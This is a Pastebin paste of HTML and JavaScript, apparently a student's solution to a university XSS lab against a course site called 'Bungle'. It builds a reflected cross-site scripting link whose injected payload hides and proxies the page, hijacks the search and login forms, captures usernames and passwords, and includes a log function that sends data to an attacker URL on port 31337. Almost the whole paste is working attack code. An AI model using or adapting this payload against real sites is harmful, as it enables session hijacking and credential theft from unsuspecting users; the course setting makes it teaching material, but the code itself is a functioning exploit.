Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(attacker) {
- function log(data) {
- console.log($.param(data));
- $.get(attacker, data);
- }
- function loadcallback() {
- console.log("callback called");
- $("html").show();
- $('#bungle-lnk').removeAttr("href");
- $('#bungle-lnk').click(function() {
- proxy('/', history.state['url'] != '/', false);
- });
- $('#search-again-btn').removeAttr("href");
- $('#search-again-btn').click(function() {
- proxy('/', true, false)
- });
- $('.history-item').each(function() {
- var value = $(this).attr('href');
- $(this).removeAttr('href');
- $(this).click(function () {
- proxy(value, true, false);
- });
- });
- // hijack search form
- $('#search-btn').click(function(e) {
- e.preventDefault();
- var attr = $("#query").val();
- // log to attacker
- console.log("search clicked");
- // fill in page
- $.ajax({
- url: "./search",
- data: {
- q: attr
- },
- type: "GET",
- success: function (data) {
- $("html").html(data);
- proxy("search?q=" + attr, true, false);
- }
- });
- });
- $('#log-in-btn').click(function(e) {
- e.preventDefault();
- var un = $('#username').val();
- var pw = $('#userpass').val();
- //TODO: log to attacker
- console.log("btn clicked: " + un + ", " + pw);
- $.ajax({
- url: "./login",
- data: {
- username: un,
- password: pw,
- },
- type: "POST",
- success: function (data) {
- $("html").html(data);
- proxy("/", false, false);
- }
- });
- });
- }
- function proxy(href, shouldPush, useHistory) {
- console.log('proxy called');
- // add appropriate url to the history stack
- if (shouldPush) {
- $("html").load(href, function() {
- loadcallback();
- history.pushState({url: href, html: $("html").html()}, "", href);
- });
- }
- else {
- if (useHistory) {
- $("html").html(history.state["html"]);
- }
- loadcallback();
- }
- }
- // do this on first injection
- $("html").hide();
- $(document).ready(function() {
- // load script to the page
- var script = document.createElement('script');
- script.type = "text/javascript";
- script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString() + "\n" + loadcallback.toString();
- $("html").append(script);
- // popstate hander
- window.onpopstate = function(e) {
- proxy(e.state['url'], false, true);
- };
- // initial history and page setup
- history.replaceState(null, "", "/"); // avoid flashing link
- $("html").load("/", function() {
- loadcallback();
- history.replaceState({url: "/", html: $("html").html()}, "", "/");
- });
- });
- }
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
- } else { // Implement code to defeat XSS defenses here.
- }
- }
- var xssdefense = 0;
- var target = "http://cos432-assn3.cs.princeton.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3>parse error</h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement